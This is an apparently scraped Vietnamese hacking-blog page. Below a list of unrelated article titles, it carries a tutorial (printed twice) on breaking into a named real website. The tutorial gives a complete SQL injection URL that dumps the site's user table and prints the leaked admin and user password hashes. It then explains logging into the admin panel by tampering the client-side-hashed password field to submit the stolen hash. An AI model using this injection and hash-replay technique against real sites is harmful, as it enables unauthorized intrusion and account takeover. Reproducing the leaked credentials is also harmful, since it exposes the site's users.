Lỗi bug trong Gmail Android cho phép bất cứ ai cũng có thể gửi email giả mạo
15 bức ảnh khoa học tuyệt đẹp trong năm 2015
Tổng hợp game mobile đua xe đáng chơi nhất 2015
Key bản quyền Sublime Text 3 (2015-2016)
Lenovo nói gì về sự cố máy tính cài sẵn phần mềm gián điệp?
Top 10 ngôn ngữ lập trình dễ bị Hack
Nguyễn Hà Đông giải thích lý do game mới Swing Copters 2 'từ chối' người Việt
Mark Zuckerberg học theo Iron Man: phát triển trợ lý ảo như 'Jarvis'
Tut by Leorius - VHB
1. Chào các bạn, mình mạo muội làm tut login khi không crack được MD5 đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.
+ Victim: http://traanh.vn/
+ Addon Tamper Data (Firefox) hoặc các addon tương tự
2. Trước tiên là tìm User,Pass:
http://traanh.vn/?frame=product_detail&id=-929%20union%20select%201,2,3,4,5,6,unhex%28hex%28group_concat%28%20id,0x7c,uid,0x7c,pwd,0x3c62722f3e%29%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20tbl_user--
1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site crack MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.
Thay vì bỏ, thì còn phương án sau.
3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):
http://traanh.vn/admin/
4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.
Đến đây có lẽ vấn đề đã được giải quyết:
+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
1. Chào các bạn, mình mạo muội làm tut login khi không crack được MD5 đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.
+ Victim: http://traanh.vn/
+ Addon Tamper Data (Firefox) hoặc các addon tương tự
2. Trước tiên là tìm User,Pass:
http://traanh.vn/?frame=product_detail&id=-929%20union%20select%201,2,3,4,5,6,unhex%28hex%28group_concat%28%20id,0x7c,uid,0x7c,pwd,0x3c62722f3e%29%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20tbl_user--
1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site crack MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.
Thay vì bỏ, thì còn phương án sau.
3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):
http://traanh.vn/admin/
4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.
Đến đây có lẽ vấn đề đã được giải quyết:
+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
![[Tut] Ngụy Trang Shell](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhhp0pTbsWYd_N8r0MY9rBpi-6fkspQPtWNCM_4W_h256Em3Dl1ajKc33yLGxGHR_rvItb9_v2stWLQq6XAaCEbBfY5AekGNtPJ54idSQD623FudR3i2AcYfSC7eQdnZqSbQBTv56Mm-8/w375-h250-c/not.PNG)
0 comments so far,add yours
Cám ơn đã ghé thăm BlogCNTT!
- Mọi thắc mắc, gợi ý hoặc bình luận xin chia sẻ bên dưới hoặc Liên Hệ
- Hãy viết bằng tiếng Việt có dấu để mọi người dễ đọc hơn!
Thank You!